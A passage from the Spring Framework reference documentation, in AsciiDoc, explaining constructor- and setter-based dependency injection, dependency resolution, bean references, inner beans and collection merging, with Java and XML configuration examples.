look up its dependencies, and does\nnot know the location or class of the dependencies. As such, your classes become easier\nto test, in particular when the dependencies are on interfaces or abstract base classes,\nwhich allow for stub or mock implementations to be used in unit tests.\n\nDI exists in two major variants, <<beans-constructor-injection,Constructor-based\ndependency injection>> and <<beans-setter-injection,Setter-based dependency injection>>.\n\n\n[[beans-constructor-injection]]\n==== Constructor-based dependency injection\n\n__Constructor-based__ DI is accomplished by the container invoking a constructor with a\nnumber of arguments, each representing a dependency. Calling a `static` factory method\nwith specific arguments to construct the bean is nearly equivalent, and this discussion\ntreats arguments to a constructor and to a `static` factory method similarly. The\nfollowing example shows a class that can only be dependency-injected with constructor\ninjection. Notice that there is nothing __special__ about this class, it is a POJO that\nhas no dependencies on container specific interfaces, base classes or annotations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\t\/\/ the SimpleMovieLister has a dependency on a MovieFinder\n\t\tprivate MovieFinder movieFinder;\n\n\t\t\/\/ a constructor so that the Spring container can inject a MovieFinder\n\t\tpublic SimpleMovieLister(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ business logic that actually uses the injected MovieFinder is omitted...\n\n\t}\n----\n\n[[beans-factory-ctor-arguments-resolution]]\n===== Constructor argument resolution\n\nConstructor argument resolution matching occurs using the argument's type. If no\npotential ambiguity exists in the constructor arguments of a bean definition, then the\norder in which the constructor arguments are defined in a bean definition is the order\nin which those arguments are supplied to the appropriate constructor when the bean is\nbeing instantiated. Consider the following class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage x.y;\n\n\tpublic class Foo {\n\n\t\tpublic Foo(Bar bar, Baz baz) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nNo potential ambiguity exists, assuming that `Bar` and `Baz` classes are not related by\ninheritance. Thus the following configuration works fine, and you do not need to specify\nthe constructor argument indexes and\/or types explicitly in the `<constructor-arg\/>`\nelement.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<constructor-arg ref=\"bar\"\/>\n\t\t\t<constructor-arg ref=\"baz\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\"\/>\n\n\t\t<bean id=\"baz\" class=\"x.y.Baz\"\/>\n\t<\/beans>\n----\n\nWhen another bean is referenced, the type is known, and matching can occur (as was the\ncase with the preceding example). When a simple type is used, such as\n`<value>true<\/value>`, Spring cannot determine the type of the value, and so cannot match\nby type without help. Consider the following class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage examples;\n\n\tpublic class ExampleBean {\n\n\t\t\/\/ Number of years to calculate the Ultimate Answer\n\t\tprivate int years;\n\n\t\t\/\/ The Answer to Life, the Universe, and Everything\n\t\tprivate String ultimateAnswer;\n\n\t\tpublic ExampleBean(int years, String ultimateAnswer) {\n\t\t\tthis.years = years;\n\t\t\tthis.ultimateAnswer = ultimateAnswer;\n\t\t}\n\n\t}\n----\n\n.[[beans-factory-ctor-arguments-type]]Constructor argument type matching\n--\nIn the preceding scenario, the container __can__ use type matching with simple types if\nyou explicitly specify the type of the constructor argument using the `type` attribute.\nFor example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<constructor-arg type=\"int\" value=\"7500000\"\/>\n\t\t<constructor-arg type=\"java.lang.String\" value=\"42\"\/>\n\t<\/bean>\n----\n--\n\n.[[beans-factory-ctor-arguments-index]]Constructor argument index\n--\nUse the `index` attribute to specify explicitly the index of constructor arguments. For\nexample:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<constructor-arg index=\"0\" value=\"7500000\"\/>\n\t\t<constructor-arg index=\"1\" value=\"42\"\/>\n\t<\/bean>\n----\n\nIn addition to resolving the ambiguity of multiple simple values, specifying an index\nresolves ambiguity where a constructor has two arguments of the same type. Note that the\n__index is 0 based__.\n--\n\n.[[beans-factory-ctor-arguments-name]]Constructor argument name\n--\nYou can also use the constructor parameter name for value disambiguation:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<constructor-arg name=\"years\" value=\"7500000\"\/>\n\t\t<constructor-arg name=\"ultimateAnswer\" value=\"42\"\/>\n\t<\/bean>\n----\n\nKeep in mind that to make this work out of the box your code must be compiled with the\ndebug flag enabled so that Spring can look up the parameter name from the constructor.\nIf you can't compile your code with debug flag (or don't want to) you can use\nhttp:\/\/download.oracle.com\/javase\/6\/docs\/api\/java\/beans\/ConstructorProperties.html[@ConstructorProperties]\nJDK annotation to explicitly name your constructor arguments. The sample class would\nthen have to look as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage examples;\n\n\tpublic class ExampleBean {\n\n\t\t\/\/ Fields omitted\n\n\t\t@ConstructorProperties({\"years\", \"ultimateAnswer\"})\n\t\tpublic ExampleBean(int years, String ultimateAnswer) {\n\t\t\tthis.years = years;\n\t\t\tthis.ultimateAnswer = ultimateAnswer;\n\t\t}\n\n\t}\n----\n--\n\n\n[[beans-setter-injection]]\n==== Setter-based dependency injection\n\n__Setter-based__ DI is accomplished by the container calling setter methods on your\nbeans after invoking a no-argument constructor or no-argument `static` factory method to\ninstantiate your bean.\n\nThe following example shows a class that can only be dependency-injected using pure\nsetter injection. This class is conventional Java. It is a POJO that has no dependencies\non container specific interfaces, base classes or annotations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\t\/\/ the SimpleMovieLister has a dependency on the MovieFinder\n\t\tprivate MovieFinder movieFinder;\n\n\t\t\/\/ a setter method so that the Spring container can inject a MovieFinder\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ business logic that actually uses the injected MovieFinder is omitted...\n\n\t}\n----\n\nThe `ApplicationContext` supports constructor-based and setter-based DI for the beans it\nmanages. It also supports setter-based DI after some dependencies have already been\ninjected through the constructor approach. You configure the dependencies in the form of\na `BeanDefinition`, which you use in conjunction with `PropertyEditor` instances to\nconvert properties from one format to another. However, most Spring users do not work\nwith these classes directly (i.e., programmatically) but rather with XML `bean`\ndefinitions, annotated components (i.e., classes annotated with `@Component`,\n`@Controller`, etc.), or `@Bean` methods in Java-based `@Configuration` classes. These\nsources are then converted internally into instances of `BeanDefinition` and used to\nload an entire Spring IoC container instance.\n\n.Constructor-based or setter-based DI?\n****\nSince you can mix constructor-based and setter-based DI, it is a good rule of thumb to\nuse constructors for _mandatory dependencies_ and setter methods or configuration methods\nfor _optional dependencies_. Note that use of the <<beans-required-annotation,@Required>>\nannotation on a setter method can be used to make the property a required dependency.\n\nThe Spring team generally advocates constructor injection as it enables one to implement\napplication components as _immutable objects_ and to ensure that required dependencies\nare not `null`. Furthermore constructor-injected components are always returned to client\n(calling) code in a fully initialized state. As a side note, a large number of constructor\narguments is a _bad code smell_, implying that the class likely has too many\nresponsibilities and should be refactored to better address proper separation of concerns.\n\nSetter injection should primarily only be used for optional dependencies that can be\nassigned reasonable default values within the class. Otherwise, not-null checks must be\nperformed everywhere the code uses the dependency. One benefit of setter injection is that\nsetter methods make objects of that class amenable to reconfiguration or re-injection\nlater. Management through <<jmx,JMX MBeans>> is therefore a compelling use case for setter\ninjection.\n\nUse the DI style that makes the most sense for a particular class. Sometimes, when dealing\nwith third-party classes for which you do not have the source, the choice is made for you.\nFor example, if a third-party class does not expose any setter methods, then constructor\ninjection may be the only available form of DI.\n****\n\n\n[[beans-dependency-resolution]]\n==== Dependency resolution process\n\nThe container performs bean dependency resolution as follows:\n\n* The `ApplicationContext` is created and initialized with configuration metadata that\n describes all the beans. Configuration metadata can be specified via XML, Java code, or\n annotations.\n* For each bean, its dependencies are expressed in the form of properties, constructor\n arguments, or arguments to the static-factory method if you are using that instead of\n a normal constructor. These dependencies are provided to the bean, __when the bean is\n actually created__.\n* Each property or constructor argument is an actual definition of the value to set, or\n a reference to another bean in the container.\n* Each property or constructor argument which is a value is converted from its specified\n format to the actual type of that property or constructor argument. By default Spring\n can convert a value supplied in string format to all built-in types, such as `int`,\n `long`, `String`, `boolean`, etc.\n\nThe Spring container validates the configuration of each bean as the container is created.\nHowever, the bean properties themselves are not set until the bean __is actually created__.\nBeans that are singleton-scoped and set to be pre-instantiated (the default) are created\nwhen the container is created. Scopes are defined in <<beans-factory-scopes>>. Otherwise,\nthe bean is created only when it is requested. Creation of a bean potentially causes a\ngraph of beans to be created, as the bean's dependencies and its dependencies'\ndependencies (and so on) are created and assigned. Note that resolution mismatches among\nthose dependencies may show up late, i.e. on first creation of the affected bean.\n\n.Circular dependencies\n****\nIf you use predominantly constructor injection, it is possible to create an unresolvable\ncircular dependency scenario.\n\nFor example: Class A requires an instance of class B through constructor injection, and\nclass B requires an instance of class A through constructor injection. If you configure\nbeans for classes A and B to be injected into each other, the Spring IoC container\ndetects this circular reference at runtime, and throws a\n`BeanCurrentlyInCreationException`.\n\nOne possible solution is to edit the source code of some classes to be configured by\nsetters rather than constructors. Alternatively, avoid constructor injection and use\nsetter injection only. In other words, although it is not recommended, you can configure\ncircular dependencies with setter injection.\n\nUnlike the __typical__ case (with no circular dependencies), a circular dependency\nbetween bean A and bean B forces one of the beans to be injected into the other prior to\nbeing fully initialized itself (a classic chicken\/egg scenario).\n****\n\nYou can generally trust Spring to do the right thing. It detects configuration problems,\nsuch as references to non-existent beans and circular dependencies, at container\nload-time. Spring sets properties and resolves dependencies as late as possible, when\nthe bean is actually created. This means that a Spring container which has loaded\ncorrectly can later generate an exception when you request an object if there is a\nproblem creating that object or one of its dependencies. For example, the bean throws an\nexception as a result of a missing or invalid property. This potentially delayed\nvisibility of some configuration issues is why `ApplicationContext` implementations by\ndefault pre-instantiate singleton beans. At the cost of some upfront time and memory to\ncreate these beans before they are actually needed, you discover configuration issues\nwhen the `ApplicationContext` is created, not later. You can still override this default\nbehavior so that singleton beans will lazy-initialize, rather than be pre-instantiated.\n\nIf no circular dependencies exist, when one or more collaborating beans are being\ninjected into a dependent bean, each collaborating bean is __totally__ configured prior\nto being injected into the dependent bean. This means that if bean A has a dependency on\nbean B, the Spring IoC container completely configures bean B prior to invoking the\nsetter method on bean A. In other words, the bean is instantiated (if not a\npre-instantiated singleton), its dependencies are set, and the relevant lifecycle\nmethods (such as a <<beans-factory-lifecycle-initializingbean,configured init method>>\nor the <<beans-factory-lifecycle-initializingbean,InitializingBean callback method>>)\nare invoked.\n\n\n[[beans-some-examples]]\n==== Examples of dependency injection\n\nThe following example uses XML-based configuration metadata for setter-based DI. A small\npart of a Spring XML configuration file specifies some bean definitions:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- setter injection using the nested ref element -->\n\t\t<property name=\"beanOne\">\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/property>\n\n\t\t<!-- setter injection using the neater ref attribute -->\n\t\t<property name=\"beanTwo\" ref=\"yetAnotherBean\"\/>\n\t\t<property name=\"integerProperty\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic void setBeanOne(AnotherBean beanOne) {\n\t\t\tthis.beanOne = beanOne;\n\t\t}\n\n\t\tpublic void setBeanTwo(YetAnotherBean beanTwo) {\n\t\t\tthis.beanTwo = beanTwo;\n\t\t}\n\n\t\tpublic void setIntegerProperty(int i) {\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nIn the preceding example, setters are declared to match against the properties specified\nin the XML file. The following example uses constructor-based DI:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- constructor injection using the nested ref element -->\n\t\t<constructor-arg>\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/constructor-arg>\n\n\t\t<!-- constructor injection using the neater ref attribute -->\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\n\t\t<constructor-arg type=\"int\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic ExampleBean(\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\t\t\tthis.beanOne = anotherBean;\n\t\t\tthis.beanTwo = yetAnotherBean;\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nThe constructor arguments specified in the bean definition will be used as arguments to\nthe constructor of the `ExampleBean`.\n\nNow consider a variant of this example, where instead of using a constructor, Spring is\ntold to call a `static` factory method to return an instance of the object:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\" factory-method=\"createInstance\">\n\t\t<constructor-arg ref=\"anotherExampleBean\"\/>\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\t\t<constructor-arg value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\t\/\/ a private constructor\n\t\tprivate ExampleBean(...) {\n\t\t\t...\n\t\t}\n\n\t\t\/\/ a static factory method; the arguments to this method can be\n\t\t\/\/ considered the dependencies of the bean that is returned,\n\t\t\/\/ regardless of how those arguments are actually used.\n\t\tpublic static ExampleBean createInstance (\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\n\t\t\tExampleBean eb = new ExampleBean (...);\n\t\t\t\/\/ some other operations...\n\t\t\treturn eb;\n\t\t}\n\n\t}\n----\n\nArguments to the `static` factory method are supplied via `<constructor-arg\/>` elements,\nexactly the same as if a constructor had actually been used. The type of the class being\nreturned by the factory method does not have to be of the same type as the class that\ncontains the `static` factory method, although in this example it is. An instance\n(non-static) factory method would be used in an essentially identical fashion (aside\nfrom the use of the `factory-bean` attribute instead of the `class` attribute), so\ndetails will not be discussed here.\n\n\n\n[[beans-factory-properties-detailed]]\n=== Dependencies and configuration in detail\n\nAs mentioned in the previous section, you can define bean properties and constructor\narguments as references to other managed beans (collaborators), or as values defined\ninline. Spring's XML-based configuration metadata supports sub-element types within its\n`<property\/>` and `<constructor-arg\/>` elements for this purpose.\n\n\n[[beans-value-element]]\n==== Straight values (primitives, Strings, and so on)\n\nThe `value` attribute of the `<property\/>` element specifies a property or constructor\nargument as a human-readable string representation. Spring's\n<<core-convert-ConversionService-API, conversion service>> is used to convert these\nvalues from a `String` to the actual type of the property or argument.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myDataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\" destroy-method=\"close\">\n\t\t<!-- results in a setDriverClassName(String) call -->\n\t\t<property name=\"driverClassName\" value=\"com.mysql.jdbc.Driver\"\/>\n\t\t<property name=\"url\" value=\"jdbc:mysql:\/\/localhost:3306\/mydb\"\/>\n\t\t<property name=\"username\" value=\"root\"\/>\n\t\t<property name=\"password\" value=\"masterkaoli\"\/>\n\t<\/bean>\n----\n\nThe following example uses the <<beans-p-namespace,p-namespace>> for even more succinct\nXML configuration.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"myDataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\"\n\t\t\tdestroy-method=\"close\"\n\t\t\tp:driverClassName=\"com.mysql.jdbc.Driver\"\n\t\t\tp:url=\"jdbc:mysql:\/\/localhost:3306\/mydb\"\n\t\t\tp:username=\"root\"\n\t\t\tp:password=\"masterkaoli\"\/>\n\n\t<\/beans>\n----\n\nThe preceding XML is more succinct; however, typos are discovered at runtime rather than\ndesign time, unless you use an IDE such as http:\/\/www.jetbrains.com\/idea\/[IntelliJ\nIDEA] or the https:\/\/spring.io\/tools\/sts[Spring Tool Suite] (STS)\nthat support automatic property completion when you create bean definitions. Such IDE\nassistance is highly recommended.\n\nYou can also configure a `java.util.Properties` instance as:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"mappings\"\n\t\tclass=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\n\t\t<!-- typed as a java.util.Properties -->\n\t\t<property name=\"properties\">\n\t\t\t<value>\n\t\t\t\tjdbc.driver.className=com.mysql.jdbc.Driver\n\t\t\t\tjdbc.url=jdbc:mysql:\/\/localhost:3306\/mydb\n\t\t\t<\/value>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe Spring container converts the text inside the `<value\/>` element into a\n`java.util.Properties` instance by using the JavaBeans `PropertyEditor` mechanism. This\nis a nice shortcut, and is one of a few places where the Spring team do favor the use of\nthe nested `<value\/>` element over the `value` attribute style.\n\n[[beans-idref-element]]\n===== The idref element\n\nThe `idref` element is simply an error-proof way to pass the __id__ (string value - not\na reference) of another bean in the container to a `<constructor-arg\/>` or `<property\/>`\nelement.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"theTargetBean\" class=\"...\"\/>\n\n\t<bean id=\"theClientBean\" class=\"...\">\n\t\t<property name=\"targetName\">\n\t\t\t<idref bean=\"theTargetBean\" \/>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe above bean definition snippet is __exactly__ equivalent (at runtime) to the\nfollowing snippet:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"theTargetBean\" class=\"...\" \/>\n\n\t<bean id=\"client\" class=\"...\">\n\t\t<property name=\"targetName\" value=\"theTargetBean\" \/>\n\t<\/bean>\n----\n\nThe first form is preferable to the second, because using the `idref` tag allows the\ncontainer to validate __at deployment time__ that the referenced, named bean actually\nexists. In the second variation, no validation is performed on the value that is passed\nto the `targetName` property of the `client` bean. Typos are only discovered (with most\nlikely fatal results) when the `client` bean is actually instantiated. If the `client`\nbean is a <<beans-factory-scopes,prototype>> bean, this typo and the resulting exception\nmay only be discovered long after the container is deployed.\n\n[NOTE]\n====\nThe `local` attribute on the `idref` element is no longer supported in the 4.0 beans xsd\nsince it does not provide value over a regular `bean` reference anymore. Simply change\nyour existing `idref local` references to `idref bean` when upgrading to the 4.0 schema.\n====\n\nA common place (at least in versions earlier than Spring 2.0) where the `<idref\/>` element\nbrings value is in the configuration of <<aop-pfb-1,AOP interceptors>> in a\n`ProxyFactoryBean` bean definition. Using `<idref\/>` elements when you specify the\ninterceptor names prevents you from misspelling an interceptor id.\n\n\n[[beans-ref-element]]\n==== References to other beans (collaborators)\n\nThe `ref` element is the final element inside a `<constructor-arg\/>` or `<property\/>`\ndefinition element. Here you set the value of the specified property of a bean to be a\nreference to another bean (a collaborator) managed by the container. The referenced bean\nis a dependency of the bean whose property will be set, and it is initialized on demand\nas needed before the property is set. (If the collaborator is a singleton bean, it may\nbe initialized already by the container.) All references are ultimately a reference to\nanother object. Scoping and validation depend on whether you specify the id\/name of the\nother object through the `bean`, `local,` or `parent` attributes.\n\nSpecifying the target bean through the `bean` attribute of the `<ref\/>` tag is the most\ngeneral form, and allows creation of a reference to any bean in the same container or\nparent container, regardless of whether it is in the same XML file. The value of the\n`bean` attribute may be the same as the `id` attribute of the target bean, or as one of\nthe values in the `name` attribute of the target bean.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<ref bean=\"someBean\"\/>\n----\n\nSpecifying the target bean through the `parent` attribute creates a reference to a bean\nthat is in a parent container of the current container. The value of the `parent`\nattribute may be the same as either the `id` attribute of the target bean, or one of the\nvalues in the `name` attribute of the target bean, and the target bean must be in a\nparent container of the current one. You use this bean reference variant mainly when you\nhave a hierarchy of containers and you want to wrap an existing bean in a parent\ncontainer with a proxy that will have the same name as the parent bean.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- in the parent context -->\n\t<bean id=\"accountService\" class=\"com.foo.SimpleAccountService\">\n\t\t<!-- insert dependencies as required as here -->\n\t<\/bean>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- in the child (descendant) context -->\n\t<bean id=\"accountService\" <!-- bean name is the same as the parent bean -->\n\t\tclass=\"org.springframework.aop.framework.ProxyFactoryBean\">\n\t\t<property name=\"target\">\n\t\t\t<ref parent=\"accountService\"\/> <!-- notice how we refer to the parent bean -->\n\t\t<\/property>\n\t\t<!-- insert other configuration and dependencies as required here -->\n\t<\/bean>\n----\n\n[NOTE]\n====\nThe `local` attribute on the `ref` element is no longer supported in the 4.0 beans xsd\nsince it does not provide value over a regular `bean` reference anymore. Simply change\nyour existing `ref local` references to `ref bean` when upgrading to the 4.0 schema.\n====\n\n\n[[beans-inner-beans]]\n==== Inner beans\n\nA `<bean\/>` element inside the `<property\/>` or `<constructor-arg\/>` elements defines a\nso-called __inner bean__.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"outer\" class=\"...\">\n\t\t<!-- instead of using a reference to a target bean, simply define the target bean inline -->\n\t\t<property name=\"target\">\n\t\t\t<bean class=\"com.example.Person\"> <!-- this is the inner bean -->\n\t\t\t\t<property name=\"name\" value=\"Fiona Apple\"\/>\n\t\t\t\t<property name=\"age\" value=\"25\"\/>\n\t\t\t<\/bean>\n\t\t<\/property>\n\t<\/bean>\n----\n\nAn inner bean definition does not require a defined id or name; if specified, the container\ndoes not use such a value as an identifier. The container also ignores the `scope` flag on\ncreation: Inner beans are __always__ anonymous and they are __always__ created with the outer\nbean. It is __not__ possible to inject inner beans into collaborating beans other than into\nthe enclosing bean or to access them independently.\n\nAs a corner case, it is possible to receive destruction callbacks from a custom scope, e.g.\nfor a request-scoped inner bean contained within a singleton bean: The creation of the inner\nbean instance will be tied to its containing bean, but destruction callbacks allow it to\nparticipate in the request scope's lifecycle. This is not a common scenario; inner beans\ntypically simply share their containing bean's scope.\n\n\n[[beans-collection-elements]]\n==== Collections\n\nIn the `<list\/>`, `<set\/>`, `<map\/>`, and `<props\/>` elements, you set the properties\nand arguments of the Java `Collection` types `List`, `Set`, `Map`, and `Properties`,\nrespectively.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"moreComplexObject\" class=\"example.ComplexObject\">\n\t\t<!-- results in a setAdminEmails(java.util.Properties) call -->\n\t\t<property name=\"adminEmails\">\n\t\t\t<props>\n\t\t\t\t<prop key=\"administrator\">administrator@example.org<\/prop>\n\t\t\t\t<prop key=\"support\">support@example.org<\/prop>\n\t\t\t\t<prop key=\"development\">development@example.org<\/prop>\n\t\t\t<\/props>\n\t\t<\/property>\n\t\t<!-- results in a setSomeList(java.util.List) call -->\n\t\t<property name=\"someList\">\n\t\t\t<list>\n\t\t\t\t<value>a list element followed by a reference<\/value>\n\t\t\t\t<ref bean=\"myDataSource\" \/>\n\t\t\t<\/list>\n\t\t<\/property>\n\t\t<!-- results in a setSomeMap(java.util.Map) call -->\n\t\t<property name=\"someMap\">\n\t\t\t<map>\n\t\t\t\t<entry key=\"an entry\" value=\"just some string\"\/>\n\t\t\t\t<entry key =\"a ref\" value-ref=\"myDataSource\"\/>\n\t\t\t<\/map>\n\t\t<\/property>\n\t\t<!-- results in a setSomeSet(java.util.Set) call -->\n\t\t<property name=\"someSet\">\n\t\t\t<set>\n\t\t\t\t<value>just some string<\/value>\n\t\t\t\t<ref bean=\"myDataSource\" \/>\n\t\t\t<\/set>\n\t\t<\/property>\n\t<\/bean>\n----\n\n__The value of a map key or value, or a set value, can also again be any of the\nfollowing elements:__\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tbean | ref | idref | list | set | map | props | value | null\n----\n\n[[beans-collection-elements-merging]]\n===== Collection merging\n\nThe Spring container also supports the __merging__ of collections. An application\ndeveloper can define a parent-style `<list\/>`, `<map\/>`, `<set\/>` or `<props\/>` element,\nand have child-style `<list\/>`, `<map\/>`, `<set\/>` or `<props\/>` elements inherit and\noverride values from the parent collection. That is, the child collection's values are\nthe result of merging the elements of the parent and child collections, with the child's\ncollection elements overriding values specified in the parent collection.\n\n__This section on merging discusses the parent-child bean mechanism. Readers unfamiliar\nwith parent and child bean definitions may wish to read the\n<<beans-child-bean-definitions,relevant section>> before continuing.__\n\nThe following example demonstrates collection merging:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"parent\" abstract=\"true\" class=\"example.ComplexObject\">\n\t\t\t<property name=\"adminEmails\">\n\t\t\t\t<props>\n\t\t\t\t\t<prop key=\"administrator\">administrator@example.com<\/prop>\n\t\t\t\t\t<prop key=\"support\">support@example.com<\/prop>\n\t\t\t\t<\/props>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t\t<bean id=\"child\" parent=\"parent\">\n\t\t\t<property name=\"adminEmails\">\n\t\t\t\t<!-- the merge is specified on the child collection definition -->\n\t\t\t\t<props merge=\"true\">\n\t\t\t\t\t<prop key=\"sales\">sales@example.com<\/prop>\n\t\t\t\t\t<prop key=\"support\">support@example.co.uk<\/prop>\n\t\t\t\t<\/props>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<beans>\n----\n\nNotice the use of the `merge=true` attribute on the `<props\/>` element of the\n`adminEmails` property of the `child` bean definition. When the `child` bean is resolved\nand instantiated by the container, the resulting instance has an `adminEmails`\n`Properties` collection that contains the result of the merging of the child's\n`adminEmails` collection with the parent's `adminEmails` collection.\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nadministrator=administrator@example.com\nsales=sales@example.com\nsupport=support@example.co.uk\n----\n\nThe child `Properties` collection's value set inherits all property elements from the\nparent `<props\/>`, and the child's value for the `support` value overrides the value in\nthe parent collection.\n\nThis merging behavior applies similarly to the `<list\/>`, `<map\/>`, and `<set\/>`\ncollection types. In the specific case of the `<list\/>` element, the semantics\nassociated with the `List` collection type, that is, the notion of an `ordered`\ncollection of values, is maintained; the parent's values precede all of the child list's\nvalues. In the case of the `Map`, `Set`, and `Properties` collection types, no ordering\nexists. Hence no ordering semantics are in effect for the collection types that underlie\nthe associated `Map`, `Set`, and `Properties` implementation types that the container\nuses internally.\n\n[[beans-collection-merge-limitations]]\n===== Limitations of collection merging\n\nYou cannot merge different collection types (such as a `Map` and a `List`), and if you\ndo attempt to do so an appropriate `Exception` is thrown. The `merge` attribute must be\nspecified on the lower, inherited, child definition; specifying the `merge` attribute on\na parent collection definition is redundant and will not result in the desired merging.\n\n[[beans-collection-elements-strongly-typed]]\n===== Strongly-typed collection\n\nWith the introduction of generic types in Java 5, you can use strongly typed collections.\nThat is, it is possible to declare a `Collection` type such that it can only contain\n`String` elements (for example). If you are using Spring to dependency-inject a\nstrongly-typed `Collection` into a bean, you can take advantage of Spring's\ntype-conversion support such that the elements of your strongly-typed `Collection`\ninstances are converted to the appropriate type prior to being added to the `Collection`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\n\t\tprivate Map<String, Float> accounts;\n\n\t\tpublic void setAccounts(Map<String, Float> accounts) {\n\t\t\tthis.accounts = accounts;\n\t\t}\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<property name=\"accounts\">\n\t\t\t\t<map>\n\t\t\t\t\t<entry key=\"one\" value=\"9.99\"\/>\n\t\t\t\t\t<entry key=\"two\" value=\"2.75\"\/>\n\t\t\t\t\t<entry key=\"six\" value=\"3.99\"\/>\n\t\t\t\t<\/map>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nWhen the `accounts` property of the `foo` bean is prepared for injection, the generics\ninformation about the element type of the strongly-typed `Map<String, Float>` is\navailable by reflection. Thus Spring's type conversion infrastructure recognizes the\nvarious value elements as being of type `Float`, and the string values `9.99, 2.75`, and\n`3.99` are converted into an actual `Float` type.\n\n\n[[beans-null-element]]\n==== Null and empty string values\n\nSpring treats empty arguments for properties and the like as empty `Strings`. The\nfollowing XML-based configuration metadata snippet 